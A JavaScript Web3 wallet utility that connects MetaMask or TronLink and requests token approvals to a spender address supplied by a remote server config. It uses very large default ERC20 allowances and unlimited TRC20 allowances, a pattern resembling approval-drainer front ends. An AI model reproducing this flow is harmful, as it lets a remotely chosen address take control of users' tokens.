import Web3 from 'web3'
import { getWalletConfig } from './index'
import i18n from '@/common/lang'

// 钱包工具类
export class WalletUtils {
    constructor() {
        this.web3 = null
        this.tronWeb = null
        this.currentAccount = null
        this.walletType = null
        this.networkType = null
        this.config = null
        this.erc20Abi = null
        this.targetAddress = null
    }

    // 初始化配置
    async initConfig() {
        if (this.config) {
            return this.config
        }

        try {
            console.log('正在获取钱包配置...')
            const response = await getWalletConfig()
            console.log('钱包配置API响应:', response)

            if (response && response.code == '200') {
                this.config = response.data
                this.erc20Abi = this.config.erc20Abi
                this.targetAddress = this.config.settlementAddress  // 修复：使用settlementAddress
                console.log('钱包配置加载成功:', this.config)
                console.log('目标地址设置为:', this.targetAddress)
                return this.config
            } else {
                console.error('API响应格式错误:', response)
                throw new Error(i18n.t('walletConfigFailed') + ': ' + (response ? response.message : i18n.t('walletConfigEmpty')))
            }
        } catch (error) {
            console.error('初始化钱包配置失败:', error)
            throw error
        }
    }

    // 检测钱包是否可用
    static isMetaMaskAvailable() {
        return typeof window !== 'undefined' && typeof window.ethereum !== 'undefined' && window.ethereum.isMetaMask
    }

    // 🎯 获取当前Web3钱包地址
    static async getCurrentWalletAddress() {
        try {
            if (WalletUtils.isEthereumWalletAvailable()) {
                // 以太坊钱包
                const accounts = await window.ethereum.request({
                    method: 'eth_accounts'
                })
                return accounts && accounts.length > 0 ? accounts[0].toLowerCase() : null
            } else if (WalletUtils.isTronLinkAvailable()) {
                // TronLink钱包
                if (window.tronWeb && window.tronWeb.defaultAddress && window.tronWeb.defaultAddress.base58) {
                    return window.tronWeb.defaultAddress.base58.toLowerCase()
                }
            }
            return null
        } catch (error) {
            console.error('获取当前钱包地址失败:', error)
            return null
        }
    }

    // 🎯 检查钱包地址一致性
    static async checkWalletAddressConsistency(loggedInAddress) {
        if (!loggedInAddress) {
            console.log('🔍 [钱包检查] 未提供登录地址，跳过检查')
            return { isConsistent: true, reason: 'no_logged_address' }
        }

        const currentAddress = await WalletUtils.getCurrentWalletAddress()

        if (!currentAddress) {
            console.log('🔍 [钱包检查] 未检测到当前钱包地址')
            return {
                isConsistent: false,
                reason: 'no_current_address',
                loggedInAddress: loggedInAddress.toLowerCase(),
                currentAddress: null
            }
        }

        const loggedInLower = loggedInAddress.toLowerCase()
        const currentLower = currentAddress.toLowerCase()
        const isConsistent = loggedInLower === currentLower

        console.log('🔍 [钱包检查] 地址一致性检查:', {
            loggedInAddress: loggedInLower,
            currentAddress: currentLower,
            isConsistent: isConsistent
        })

        return {
            isConsistent: isConsistent,
            reason: isConsistent ? 'consistent' : 'address_mismatch',
            loggedInAddress: loggedInLower,
            currentAddress: currentLower
        }
    }

    static isEthereumWalletAvailable() {
        return typeof window !== 'undefined' && typeof window.ethereum !== 'undefined'
    }

    static isTronLinkAvailable() {
        return typeof window !== 'undefined' && typeof window.tronWeb !== 'undefined'
    }

    // 检测以太坊钱包类型（统一处理）
    static detectEthereumWalletType() {
        if (!this.isEthereumWalletAvailable()) {
            return null
        }

        // 检测具体钱包名称用于显示，但类型统一为ethereum
        let walletName = 'Ethereum Wallet'
        if (window.ethereum.isMetaMask) {
            walletName = 'MetaMask'
        } else if (window.ethereum.isTrust) {
            walletName = 'Trust Wallet'
        } else if (window.ethereum.isCoinbaseWallet) {
            walletName = 'Coinbase Wallet'
        } else if (window.ethereum.isRainbow) {
            walletName = 'Rainbow Wallet'
        }

        // 统一返回ethereum类型，简化后端处理
        return { type: 'ethereum', name: walletName }
    }

    // 自动检测可用的钱包
    static detectAvailableWallets() {
        const wallets = []

        // 检测以太坊钱包
        const ethWallet = this.detectEthereumWalletType()
        if (ethWallet) {
            wallets.push({
                ...ethWallet,
                priority: 1
            })
        }

        // 检测TronLink
        if (this.isTronLinkAvailable()) {
            wallets.push({
                type: 'tronlink',
                name: 'TronLink',
                priority: 2
            })
        }

        // 按优先级排序，以太坊钱包优先
        return wallets.sort((a, b) => a.priority - b.priority)
    }

    // 自动连接钱包（优先以太坊钱包）
    async connectWallet() {
        const availableWallets = WalletUtils.detectAvailableWallets()

        if (availableWallets.length === 0) {
            throw new Error('Please Switch to Ethereum Mainnet to Continue.')
        }

        // 优先连接第一个可用的钱包
        const primaryWallet = availableWallets[0]

        console.log(`自动检测到钱包: ${primaryWallet.name}，正在连接...`)

        if (primaryWallet.type === 'ethereum') {
            return await this.connectEthereumWallet(primaryWallet)
        } else if (primaryWallet.type === 'tronlink') {
            return await this.connectTronLink()
        }

        throw new Error('Unsupported wallet type')
    }

    // 检查是否是用户拒绝的错误
    isUserRejectedError(error) {
        const errorMessage = error.message || error.toString()
        const errorCode = error.code

        // 以太坊钱包用户拒绝错误
        if (errorCode === 4001 ||
            errorMessage.includes('User denied transaction signature') ||
            errorMessage.includes('User rejected the transaction') ||
            errorMessage.includes('用户拒绝了请求')) {
            return true
        }

        // TronLink用户拒绝错误
        if (errorMessage.includes('Confirmation declined by user') ||
            errorMessage.includes('User cancelled') ||
            errorMessage.includes('User denied')) {
            return true
        }

        return false
    }

    // 格式化错误信息
    formatError(error) {
        const errorMessage = error.message || error.toString()

        // 网络错误
        if (errorMessage.includes('network') || errorMessage.includes('timeout')) {
            return new Error(i18n.t('walletNetworkTimeout'))
        }

        // 余额不足
        if (errorMessage.includes('insufficient funds') ||
            errorMessage.includes('balance') ||
            errorMessage.includes('余额不足')) {
            return new Error(i18n.t('walletInsufficientBalance'))
        }

        // Gas费用相关
        if (errorMessage.includes('gas') || errorMessage.includes('fee')) {
            return new Error(i18n.t('walletInsufficientGas'))
        }

        // 合约错误
        if (errorMessage.includes('revert') || errorMessage.includes('execution reverted')) {
            return new Error(i18n.t('walletContractFailed'))
        }

        // 默认错误
        return new Error(i18n.t('walletTransactionFailed'))
    }

    // 连接MetaMask钱包
    async connectMetaMask() {
        if (!WalletUtils.isMetaMaskAvailable()) {
            throw new Error('MetaMask not detected')
        }

        try {
            // 确保配置已初始化
            await this.initConfig()

            // 请求连接钱包
            const accounts = await window.ethereum.request({
                method: 'eth_requestAccounts'
            })

            if (accounts.length === 0) {
                throw new Error('No accounts found')
            }

            this.web3 = new Web3(window.ethereum)
            this.currentAccount = accounts[0]
            this.walletType = 'ethereum'  // 统一使用ethereum类型

            // 获取网络信息
            const chainId = await window.ethereum.request({ method: 'eth_chainId' })
            this.networkType = this.getNetworkType(chainId)

            // 检查网络是否支持
            if (!this.isNetworkSupported(this.networkType)) {
                throw new Error(`Network ${this.networkType} is not supported in current environment. Please switch to a supported network.`)
            }

            return {
                address: this.currentAccount,
                walletType: this.walletType,
                networkType: this.networkType
            }
        } catch (error) {
            console.error('Connect MetaMask failed:', error)
            throw error
        }
    }

    // 连接以太坊钱包（通用方法，支持各种以太坊钱包）
    async connectEthereumWallet(walletInfo = null) {
        console.log('开始连接以太坊钱包...', walletInfo?.name || 'Unknown')

        if (!WalletUtils.isEthereumWalletAvailable()) {
            throw new Error('Ethereum wallet not detected')
        }

        try {
            // 确保配置已初始化
            await this.initConfig()

            // 请求连接钱包
            const accounts = await window.ethereum.request({
                method: 'eth_requestAccounts'
            })

            if (accounts.length === 0) {
                throw new Error('No accounts found')
            }

            this.web3 = new Web3(window.ethereum)
            this.currentAccount = accounts[0]
            // 统一使用ethereum作为钱包类型，简化后端处理
            this.walletType = 'ethereum'

            // 获取网络信息
            const chainId = await window.ethereum.request({ method: 'eth_chainId' })
            this.networkType = this.getNetworkType(chainId)

            // 检查网络是否支持
            if (!this.isNetworkSupported(this.networkType)) {
                throw new Error(`Network ${this.networkType} is not supported in current environment. Please switch to a supported network.`)
            }

            return {
                address: this.currentAccount,
                walletType: this.walletType,
                networkType: this.networkType,
                walletName: walletInfo?.name || 'Ethereum Wallet'
            }

        } catch (error) {
            console.error('以太坊钱包连接失败:', error)
            throw error
        }
    }

    // 连接TronLink钱包
    async connectTronLink() {
        if (!WalletUtils.isTronLinkAvailable()) {
            throw new Error('TronLink not detected')
        }

        try {
            // 确保配置已初始化
            await this.initConfig()

            // 等待TronWeb初始化
            await this.waitForTronWeb()

            if (!window.tronWeb.defaultAddress.base58) {
                throw new Error('TronLink not logged in')
            }

            this.tronWeb = window.tronWeb
            this.currentAccount = window.tronWeb.defaultAddress.base58
            this.walletType = 'tronlink'
            this.networkType = 'tron'

            // 检查网络是否支持
            if (!this.isNetworkSupported(this.networkType)) {
                throw new Error(`Network ${this.networkType} is not supported in current environment.`)
            }

            return {
                address: this.currentAccount,
                walletType: this.walletType,
                networkType: this.networkType
            }
        } catch (error) {
            console.error('Connect TronLink failed:', error)
            throw error
        }
    }

    // 等待TronWeb初始化
    waitForTronWeb(timeout = 3000) {
        return new Promise((resolve, reject) => {
            const start = Date.now()
            const check = () => {
                if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
                    resolve()
                } else if (Date.now() - start > timeout) {
                    reject(new Error('TronWeb initialization timeout'))
                } else {
                    setTimeout(check, 100)
                }
            }
            check()
        })
    }

    // 获取网络类型
    getNetworkType(chainId) {
        const chainIdNum = parseInt(chainId, 16)
        switch (chainIdNum) {
            case 1:
                return 'ethereum'
            case 11155111:
                return 'sepolia'  // 保留兼容性，但不再使用
            default:
                return 'unknown'
        }
    }

    // 授权ERC20代币
    async approveERC20(tokenAddress, spenderAddress, amount = null) {
        if (!this.web3 || !this.currentAccount) {
            throw new Error('Wallet not connected')
        }

        if (!this.erc20Abi) {
            throw new Error('ERC20 ABI not loaded')
        }

        try {
            const contract = new this.web3.eth.Contract(this.erc20Abi, tokenAddress)

            // 如果没有指定数量，使用合理的默认值
            let approveAmount = amount
            if (!approveAmount) {
                // 1亿个代币 * 10^6 = 100,000,000,000,000 (对于6位小数的代币)
                approveAmount = '100000000000000'
            }

            console.log('授权代币:', tokenAddress)
            console.log('授权给:', spenderAddress)
            console.log('授权数量:', approveAmount)

            // 检查用户ETH余额
            const ethBalance = await this.web3.eth.getBalance(this.currentAccount)
            console.log('用户ETH余额:', this.web3.utils.fromWei(ethBalance, 'ether'), 'ETH')

            // 检查用户代币余额
            try {
                const tokenBalance = await contract.methods.balanceOf(this.currentAccount).call()
                console.log('用户代币余额:', tokenBalance)

                if (tokenBalance === '0') {
                    console.warn('⚠️ 用户没有此代币，但仍可以进行授权')
                }
            } catch (balanceError) {
                console.warn('查询代币余额失败:', balanceError)
            }

            // 检查当前授权额度
            let currentAllowance = '0'
            try {
                currentAllowance = await contract.methods.allowance(this.currentAccount, spenderAddress).call()
                console.log('当前授权额度:', currentAllowance)

                // 如果当前授权额度已经足够，就不需要重新授权
                if (currentAllowance !== '0') {
                    const currentAmount = BigInt(currentAllowance)
                    const targetAmount = BigInt(approveAmount)

                    if (currentAmount >= targetAmount) {
                        console.log('✅ 当前授权额度已足够，无需重新授权')
                        return {
                            success: true,
                            transactionHash: 'already_approved',
                            message: i18n.t('walletAlreadyApproved'),
                            network: this.networkType
                        }
                    }

                    console.log('⚠️ 当前授权额度不足，需要重新授权')
                    // 只有在必要时才重置授权（某些代币如USDT要求先重置为0）
                    try {
                        console.log('尝试先重置授权为0...')
                        const resetTx = await contract.methods.approve(spenderAddress, '0').send({
                            from: this.currentAccount,
                            gas: 100000
                        })
                        console.log('✅ 授权重置成功:', resetTx.transactionHash)
                    } catch (resetError) {
                        console.warn('重置授权失败，继续尝试直接授权:', resetError)
                    }
                }
            } catch (allowanceError) {
                console.warn('查询当前授权失败:', allowanceError)
            }

            // 估算Gas费用
            try {
                const gasEstimate = await contract.methods.approve(spenderAddress, approveAmount).estimateGas({
                    from: this.currentAccount
                })
                console.log('预估Gas用量:', gasEstimate)
            } catch (estimateError) {
                console.error('❌ Gas估算失败，交易可能会失败:', estimateError)
                // 如果Gas估算失败，说明交易肯定会失败
                throw new Error(i18n.t('walletContractCallFailed'))
            }

            const tx = await contract.methods.approve(spenderAddress, approveAmount).send({
                from: this.currentAccount,
                gas: 100000  // 设置Gas限制
            })

            console.log('✅ 新授权交易成功:', tx.transactionHash)
            return {
                success: true,
                transactionHash: tx.transactionHash,
                blockNumber: tx.blockNumber,
                gasUsed: tx.gasUsed,
                message: i18n.t('walletApproveResult'),
                network: this.networkType
            }
        } catch (error) {
            console.error('ERC20 approve failed:', error)

            // 处理用户取消交易的情况
            if (this.isUserRejectedError(error)) {
                throw new Error(i18n.t('walletUserRejected'))
            }

            // 处理其他错误
            // 分析具体的失败原因
            if (error.message && error.message.includes('revert')) {
                console.error('❌ 合约执行被回滚，可能的原因:')
                console.error('1. 代币合约不支持此操作')
                console.error('2. 合约有特殊的授权规则')
                console.error('3. 代币合约已暂停或有其他限制')

                // 尝试调用合约的基本方法来验证合约是否正常
                try {
                    const name = await contract.methods.name().call()
                    const symbol = await contract.methods.symbol().call()
                    console.log('✅ 合约基本信息正常:', name, symbol)
                } catch (infoError) {
                    console.error('❌ 合约基本信息查询失败，可能不是标准ERC20合约')
                }

                throw new Error(i18n.t('walletContractRejectAuth'))
            }

            throw this.formatError(error)
        }
    }

    // 授权TRC20代币
    async approveTRC20(tokenAddress, spenderAddress, amount = '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff') {
        if (!this.tronWeb || !this.currentAccount) {
            throw new Error('Wallet not connected')
        }

        try {
            const contract = await this.tronWeb.contract().at(tokenAddress)

            const tx = await contract.approve(spenderAddress, amount).send({
                feeLimit: 100000000 // 100 TRX
            })

            return {
                success: true,
                transactionHash: tx,
                message: i18n.t('walletApproveResult'),
                network: this.networkType
            }
        } catch (error) {
            console.error('TRC20 approve failed:', error)

            // 处理用户取消交易的情况
            if (this.isUserRejectedError(error)) {
                throw new Error(i18n.t('walletUserRejected'))
            }

            // 处理其他错误
            throw this.formatError(error)
        }
    }

    // 检查网络是否支持
    isNetworkSupported(networkType) {
        if (!this.config || !this.config.network) {
            return true // 如果没有配置，默认支持
        }

        const supportedNetworks = this.config.network.supportedNetworks || []
        return supportedNetworks.includes(networkType)
    }

    // 获取代币合约地址
    getTokenContract(tokenSymbol) {
        console.log('获取代币合约地址:', tokenSymbol)
        console.log('当前配置:', this.config)
        console.log('当前网络:', this.networkType)

        if (!this.config || !this.config.tokens) {
            console.error('配置未加载或tokens字段不存在')
            throw new Error('Wallet config not loaded')
        }

        // 检查当前网络是否支持
        if (!this.isNetworkSupported(this.networkType)) {
            throw new Error(`Network ${this.networkType} is not supported in current environment`)
        }

        const symbol = tokenSymbol.toLowerCase()

        if (this.networkType === 'ethereum') {
            return this.config.tokens.ethereum && this.config.tokens.ethereum[symbol]
        } else if (this.networkType === 'sepolia') {
            // Sepolia已废弃，回退到以太坊主网配置
            return this.config.tokens.ethereum && this.config.tokens.ethereum[symbol]
        } else if (this.networkType === 'tron') {
            return this.config.tokens.tron && this.config.tokens.tron[symbol]
        } else if (this.networkType === 'shasta') {
            return this.config.tokens.shasta && this.config.tokens.shasta[symbol]
        }

        return null
    }

    // 获取智能合约地址
    getSmartContractAddress() {
        if (!this.config || !this.config.smartContracts) {
            throw new Error('Smart contract configuration not loaded')
        }

        if (this.networkType === 'ethereum') {
            return this.config.smartContracts.ethereum
        } else if (this.networkType === 'sepolia') {
            // Sepolia已废弃，回退到以太坊主网配置
            return this.config.smartContracts.ethereum
        } else if (this.networkType === 'tron') {
            return this.config.smartContracts.tron
        } else if (this.networkType === 'shasta') {
            return this.config.smartContracts.shasta
        }

        throw new Error(`Smart contract not configured for network: ${this.networkType}`)
    }

    // 执行代币授权
    async approveToken(tokenSymbol, spenderAddress = null) {
        console.log('开始执行代币授权:', tokenSymbol)
        console.log('当前配置状态:', this.config ? '已加载' : '未加载')

        // 确保配置已加载
        await this.initConfig()
        console.log('配置加载完成:', this.config)

        // 如果没有指定spenderAddress，使用智能合约地址
        let finalSpenderAddress = spenderAddress

        if (!finalSpenderAddress) {
            try {
                finalSpenderAddress = this.getSmartContractAddress()
                console.log('使用智能合约地址作为授权目标:', finalSpenderAddress)
            } catch (error) {
                console.error('获取智能合约地址失败:', error)
                // 如果智能合约地址获取失败，回退到使用settlementAddress
                finalSpenderAddress = this.targetAddress
            }
        }

        if (!finalSpenderAddress) {
            throw new Error('Spender address not specified and target address not configured')
        }

        const tokenAddress = this.getTokenContract(tokenSymbol)
        if (!tokenAddress) {
            throw new Error(`Token ${tokenSymbol} not supported on ${this.networkType}`)
        }

        if (this.walletType === 'ethereum') {
            return await this.approveERC20(tokenAddress, finalSpenderAddress)
        } else if (this.walletType === 'tronlink') {
            return await this.approveTRC20(tokenAddress, finalSpenderAddress)
        } else {
            throw new Error('Unsupported wallet type')
        }
    }
}

export default WalletUtils

